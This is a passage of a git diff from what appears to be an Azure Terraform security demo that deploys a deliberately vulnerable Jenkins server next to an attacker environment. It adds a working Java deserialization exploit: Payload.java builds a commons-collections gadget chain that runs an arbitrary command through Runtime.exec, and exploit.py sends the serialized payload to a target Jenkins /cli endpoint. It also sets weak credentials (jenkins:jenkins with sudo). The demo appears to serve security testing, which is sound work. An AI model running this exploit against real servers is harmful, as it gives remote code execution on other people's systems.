rg_name}) - WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) - - if run_plan: - print('Calling tf.plan') - tf.plan(capture_output=False) - - return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) - # return_code1 =0 - 
print('Got return code {}'.format(return_code1)) - - if return_code1 != 0: - logger.info("Failed to destroy build ") - - exit() - else: - - logger.info("Destroyed WebInDeploy ") + tfstate_file = 'terraform.tfstate' + tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup'] + + fpath = './WebInDeploy/' + tfstate_file + if os.path.isfile(fpath): + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + rg_name1 = tf.output('Attacker_RG_Name') + delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInDeploy + # + delete_state_files('./WebInDeploy/', tfstate_files) - WebInBootstrap_vars.update({'RG_Name': rg_name}) - WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) - tf = Terraform(working_dir='./WebInBootstrap') + fpath = './WebInBootstrap/' + tfstate_file + if os.path.isfile(fpath): + delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInBootstrap + # + delete_state_files('./WebInBootstrap/', tfstate_files) - if run_plan: - print('Calling tf.plan') - tf.plan(capture_output=False) - return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) - # return_code1 =0 - print('Got return code {}'.format(return_code1)) + # + # Delete state files WebInFWConf + # + delete_state_files('./WebInFWConf/', tfstate_files) - if return_code1 != 0: - logger.info("WebInBootstrap destroyed") - deployment_status = {'WebInDeploy': 'Fail'} - exit() - else: - deployment_status = {'WebInDeploy': 'Success'} - exit() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Get Terraform Params') parser.add_argument('-u', '--username', help='Firewall Username', required=True) parser.add_argument('-p', '--password', help='Firewall Password', required=True) - args = parser.parse_args() username = args.username password = args.password - + # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) main(username, password) diff --git a/azure/Jenkins_proj-master/jenkins/Dockerfile b/azure/Jenkins_proj-master/jenkins/Dockerfile new file mode 100644 index 00000000..1dea80e9 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/Dockerfile @@ -0,0 +1,38 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/* + + +ENV JENKINS_HOME /var/jenkins_home +ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log + +RUN groupadd -g 1000 jenkins \ + && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \ + && adduser jenkins sudo \ + && echo 'jenkins:jenkins' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +ENV JENKINS_VERSION 2.32.1 +RUN set -ex \ + && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ + && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ + && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref + +EXPOSE 8080 +EXPOSE 50000 + +COPY jenkins.sh /usr/local/bin/jenkins.sh + +RUN chmod +x /usr/local/bin/jenkins.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] + +CMD ["/usr/local/bin/jenkins.sh"] diff --git a/azure/Jenkins_proj-master/jenkins/config.xml 
b/azure/Jenkins_proj-master/jenkins/config.xml new file mode 100644 index 00000000..071c4fb7 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/config.xml @@ -0,0 +1,35 @@ + + + admin admin + + + N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq + + + + + + All + false + false + + + + + + default + + + + + + false + + + bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46 + + + admin@admin.com + + + diff --git a/azure/Jenkins_proj-master/jenkins/docker-compose.yml b/azure/Jenkins_proj-master/jenkins/docker-compose.yml new file mode 100644 index 00000000..61334042 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/docker-compose.yml @@ -0,0 +1,11 @@ +version: '3' +services: + jenkins: + build: . + container_name: jenkins + environment: + JAVA_OPTS: "-Djava.awt.headless=true" + JAVA_OPTS: "-Djenkins.install.runSetupWizard=false" + ports: + - "50000:50000" + - "8080:8080" diff --git a/azure/Jenkins_proj-master/jenkins/jenkins.sh b/azure/Jenkins_proj-master/jenkins/jenkins.sh new file mode 100644 index 00000000..b44f6ba2 --- /dev/null +++ b/azure/Jenkins_proj-master/jenkins/jenkins.sh @@ -0,0 +1,24 @@ +#! /bin/bash -e + +: "${JENKINS_HOME:="/var/jenkins_home"}" +touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; } +echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG" + +# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + # read JAVA_OPTS and JENKINS_OPTS into arrays + java_opts_array=() + while IFS= read -r -d '' item; do + java_opts_array+=( "$item" ) + done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS") + + jenkins_opts_array=( ) + while IFS= read -r -d '' item; do + jenkins_opts_array+=( "$item" ) + done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS") + + exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@" +fi + +exec "$@" diff --git a/azure/Jenkins_proj-master/jenkins/tini b/azure/Jenkins_proj-master/jenkins/tini new file mode 100644 index 00000000..4e5b36a9 Binary files /dev/null and b/azure/Jenkins_proj-master/jenkins/tini differ diff --git a/azure/Jenkins_proj-master/payload/Payload.java b/azure/Jenkins_proj-master/payload/Payload.java new file mode 100644 index 00000000..cbd4c8b5 --- /dev/null +++ b/azure/Jenkins_proj-master/payload/Payload.java @@ -0,0 +1,189 @@ +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamException; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.PrivateKey; +import java.security.PublicKey; +import java.security.Signature; +import java.security.SignedObject; +import java.util.Comparator; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import java.util.concurrent.ConcurrentSkipListSet; +import java.util.concurrent.CopyOnWriteArraySet; + +import net.sf.json.JSONArray; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.collection.AbstractCollectionDecorator; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import 
org.apache.commons.collections.map.LazyMap; +import org.apache.commons.collections.map.ReferenceMap; +import org.apache.commons.collections.set.ListOrderedSet; + +public class Payload implements Serializable { + + private Serializable payload; + + public Payload(String cmd) throws Exception { + + this.payload = this.setup(cmd); + + } + + public Serializable setup(String cmd) throws Exception { + final String[] execArgs = new String[] { cmd }; + + final Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + execArgs), new ConstantTransformer(1) }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + final Map innerMap = new HashMap(); + + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException e) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + + Field f2 = null; + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException e) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array2 = (Object[]) f2.get(innimpl); + + Object node = array2[0]; + if (node == null) { + node = array2[1]; + } + + Field keyField = null; + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception e) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField( + "key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + PublicKey publicKey = keyPair.getPublic(); + + Signature signature = Signature.getInstance(privateKey.getAlgorithm()); + SignedObject payload = new SignedObject(map, privateKey, signature); + JSONArray array = new JSONArray(); + + array.add("asdf"); + + ListOrderedSet set = new ListOrderedSet(); + Field f1 = AbstractCollectionDecorator.class + .getDeclaredField("collection"); + f1.setAccessible(true); + f1.set(set, array); + + DummyComperator comp = new DummyComperator(); + ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); + csls.add(payload); + + CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); + CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); + + a1.add(set); + Container c = new Container(csls); + a1.add(c); + + a2.add(csls); + a2.add(set); + + ReferenceMap flat3map = new ReferenceMap(); + flat3map.put(new Container(a1), "asdf"); + flat3map.put(new Container(a2), "asdf"); + + return flat3map; + } + + private Object writeReplace() throws ObjectStreamException { + return this.payload; + } + + static class Container implements Serializable { + + private Object o; + + public Container(Object o) { + this.o = o; + } + + private Object writeReplace() throws ObjectStreamException { + return o; + } + + } + + static class DummyComperator implements Comparator, Serializable { + + public int 
compare(Object arg0, Object arg1) { + // TODO Auto-generated method stub + return 0; + } + + private Object writeReplace() throws ObjectStreamException { + return null; + } + + } + + public static void main(String args[]) throws Exception{ + + if(args.length != 2){ + System.out.println("java -jar payload.jar outfile cmd"); + System.exit(0); + } + + String cmd = args[1]; + FileOutputStream out = new FileOutputStream(args[0]); + + Payload pwn = new Payload(cmd); + ObjectOutputStream oos = new ObjectOutputStream(out); + oos.writeObject(pwn); + oos.flush(); + out.flush(); + + + } + +} \ No newline at end of file diff --git a/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar new file mode 100644 index 00000000..218510bc Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar new file mode 100644 index 00000000..c35fa1fe Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar new file mode 100644 index 00000000..98467d3a Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar differ diff --git a/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar new file mode 100644 index 00000000..93a3b9f6 Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar differ diff --git a/azure/Jenkins_proj-master/payload/exploit.py b/azure/Jenkins_proj-master/payload/exploit.py new file mode 100644 index 00000000..89c789d4 --- /dev/null +++ b/azure/Jenkins_proj-master/payload/exploit.py @@ -0,0 +1,92 @@ +import urllib +import requests +import uuid +import threading +import time +import gzip +import urllib3 +import zlib +import subprocess + +proxies = { +# 'http': 'http://127.0.0.1:8085', +# 'https': 'http://127.0.0.1:8090', +} + +TARGET = input("Enter Jenkins Target IP Address: ") +URL='http://' + TARGET + ':80/cli' + +PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' +PROTO = b'\x00\x00\x00\x00' + + +FILE_SER = open("payload.ser", "rb").read() + +def download(url, session): + + headers = {'Side' : 'download'} + #headers['Content-type'] = 'application/x-www-form-urlencoded' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Session'] = session + headers['Transfer-Encoding'] = 'chunked' + r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) + print(r.content) + + +def upload(url, session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding'] = None + r = requests.post(url,data=data,headers=headers,proxies=proxies) + + +def 
upload_chunked(url,session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding']= None + headers['Transfer-Encoding'] = 'chunked' + headers['Cache-Control'] = 'no-cache' + + r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies) + + +def null_payload(): + yield b" " + +def create_payload(): + payload = PREAMBLE + PROTO + FILE_SER + + return payload + +def create_payload_chunked(): + yield PREAMBLE + yield PROTO + yield FILE_SER + +def main(): + print("start") + + session = str(uuid.uuid4()) + + t = threading.Thread(target=download, args=(URL, session)) + t.start() + + time.sleep(1) + print("pwn") + #upload(URL, session, create_payload()) + + upload_chunked(URL, session, "asdf") + +if __name__ == "__main__": + main() diff --git a/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar new file mode 100644 index 00000000..30fad12d Binary files /dev/null and b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar differ diff --git a/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar new file mode 100644 index 00000000..a47f128a Binary files /dev/null and b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar differ diff --git a/azure/Jenkins_proj-master/payload/payload.jar b/azure/Jenkins_proj-master/payload/payload.jar new file mode 100644 index 00000000..51e0bcc9 Binary files /dev/null and b/azure/Jenkins_proj-master/payload/payload.jar differ diff --git a/azure/Jenkins_proj-master/requirements.txt b/azure/Jenkins_proj-master/requirements.txt index 98083fd2..f5126452 100644 --- a/azure/Jenkins_proj-master/requirements.txt +++ b/azure/Jenkins_proj-master/requirements.txt @@ -1,183 +1,227 @@ -adal -antlr4-python3-runtime -applicationinsights -argcomplete -asn1crypto -azure-batch -azure-cli -azure-cli-acr -azure-cli-acs -azure-cli-advisor -azure-cli-ams -azure-cli-appservice -azure-cli-backup -azure-cli-batch -azure-cli-batchai -azure-cli-billing -azure-cli-botservice -azure-cli-cdn -azure-cli-cloud -azure-cli-cognitiveservices -azure-cli-command-modules-nspkg -azure-cli-configure -azure-cli-consumption -azure-cli-container -azure-cli-core -azure-cli-cosmosdb -azure-cli-dla -azure-cli-dls -azure-cli-dms -azure-cli-eventgrid -azure-cli-eventhubs -azure-cli-extension -azure-cli-feedback -azure-cli-find -azure-cli-hdinsight -azure-cli-interactive -azure-cli-iot -azure-cli-iotcentral -azure-cli-keyvault -azure-cli-kusto -azure-cli-lab -azure-cli-maps -azure-cli-monitor -azure-cli-network -azure-cli-nspkg -azure-cli-policyinsights -azure-cli-privatedns -azure-cli-profile -azure-cli-rdbms -azure-cli-redis -azure-cli-relay -azure-cli-reservations -azure-cli-resource -azure-cli-role -azure-cli-search -azure-cli-security -azure-cli-servicebus -azure-cli-servicefabric -azure-cli-signalr -azure-cli-sql -azure-cli-sqlvm -azure-cli-storage -azure-cli-telemetry -azure-cli-vm -azure-common -azure-datalake-store -azure-functions-devops-build -azure-graphrbac -azure-keyvault -azure-mgmt-advisor -azure-mgmt-applicationinsights -azure-mgmt-authorization -azure-mgmt-batch -azure-mgmt-batchai 
-azure-mgmt-billing -azure-mgmt-botservice -azure-mgmt-cdn -azure-mgmt-cognitiveservices -azure-mgmt-compute -azure-mgmt-consumption -azure-mgmt-containerinstance -azure-mgmt-containerregistry -azure-mgmt-containerservice -azure-mgmt-cosmosdb -azure-mgmt-datalake-analytics -azure-mgmt-datalake-nspkg -azure-mgmt-datalake-store -azure-mgmt-datamigration -azure-mgmt-devtestlabs -azure-mgmt-dns -azure-mgmt-eventgrid -azure-mgmt-eventhub -azure-mgmt-hdinsight -azure-mgmt-iotcentral -azure-mgmt-iothub -azure-mgmt-iothubprovisioningservices -azure-mgmt-keyvault -azure-mgmt-kusto -azure-mgmt-loganalytics -azure-mgmt-managementgroups -azure-mgmt-maps -azure-mgmt-marketplaceordering -azure-mgmt-media -azure-mgmt-monitor -azure-mgmt-msi -azure-mgmt-network -azure-mgmt-nspkg -azure-mgmt-policyinsights -azure-mgmt-privatedns -azure-mgmt-rdbms -azure-mgmt-recoveryservices -azure-mgmt-recoveryservicesbackup -azure-mgmt-redis -azure-mgmt-relay -azure-mgmt-reservations -azure-mgmt-resource -azure-mgmt-search -azure-mgmt-security -azure-mgmt-servicebus -azure-mgmt-servicefabric -azure-mgmt-signalr -azure-mgmt-sql -azure-mgmt-sqlvirtualmachine -azure-mgmt-storage -azure-mgmt-trafficmanager -azure-mgmt-web -azure-multiapi-storage -azure-nspkg -azure-storage -azure-storage-blob -azure-storage-common -azure-storage-nspkg -bcrypt -certifi -cffi -chardet -colorama -cryptography -fabric -humanfriendly -idna -invoke -ipaddress -isodate -Jinja2 -jmespath -knack -MarkupSafe -mock -msrest -msrestazure -oauthlib -pan-python -pandevice -paramiko -pbr -portalocker -prompt-toolkit -psutil -pyasn1 -pycparser -pydocumentdb -Pygments -PyJWT -PyNaCl -pyOpenSSL -pyperclip -python-dateutil -python-terraform -pytz -PyYAML -requests -requests-oauthlib -scp -six -sshtunnel -tabulate -urllib3 -vsts -vsts-cd-manager -wcwidth -websocket-client -xmltodict \ No newline at end of file +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.7 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 +azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 
+azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 +azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 +azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage==0.36.0 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-file==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +collections2==0.3.0 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2.8 +django-widget-tweaks==1.4.3 +docker==3.7.2 +docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +pandevice==0.6.6 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.2.1 +prompt-toolkit==1.0.15 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +python-terraform==0.10.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +twisted>=19.7.0 +txaio==18.8.1 +urllib3==1.24.2 
+vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf new file mode 100644 index 00000000..45ed9eb8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf @@ -0,0 +1,2 @@ +variable "RG_Name" {} +variable "Azure_Region" {} diff --git a/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf new file mode 100644 index 00000000..0c187a78 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf @@ -0,0 +1,10 @@ +resource "random_id" "storage_account" { + byte_length = 2 +} +resource "azurerm_storage_account" "bootstrap" { + name = "bootstrap${lower(random_id.storage_account.hex)}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + account_tier = "Standard" + account_replication_type = "LRS" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf new file mode 100644 index 00000000..4c5d6346 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf @@ -0,0 +1,9 @@ +output "Resource_Group" { + value = "${azurerm_resource_group.resourcegroup.name}" +} +output "Storage_Account_Access_Key" { + value = "${azurerm_storage_account.bootstrap.primary_access_key}" +} +output "Bootstrap_Bucket" { + value="bootstrap${lower(random_id.storage_account.hex)}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf new file mode 100644 index 00000000..7c24c105 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf @@ -0,0 +1,14 @@ +# Configure the Microsoft Azure Provider +provider "azurerm" {} + +resource "random_id" "resource_group" { + byte_length = 2 +} + +# ********** RESOURCE GROUP ********** + +# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}-${lower(random_id.resource_group.hex)}" + location = "${var.Azure_Region}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars new file mode 100644 index 00000000..9f03abf8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars @@ -0,0 +1,3 @@ +RG_Name = "" + +Azure_Region = "" diff --git a/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf new file mode 100644 index 00000000..3d83fa8d --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf @@ -0,0 +1,25 @@ +variable "RG_Name" {} +variable "Attack_RG_Name" {} +variable "Azure_Region" {} +variable "Admin_Username" {} +variable "Admin_Password" {} +variable "Bootstrap_Storage_Account" {} +variable "Storage_Account_Access_Key" {} +variable "Storage_Account_Fileshare" {} +variable "Storage_Account_Fileshare_Directory" {} +variable "Web_Initscript_Path" {} +variable "Attack_Initscript_Path" {} +variable "Victim_CIDR" {} +variable "Attack_CIDR" {} +variable 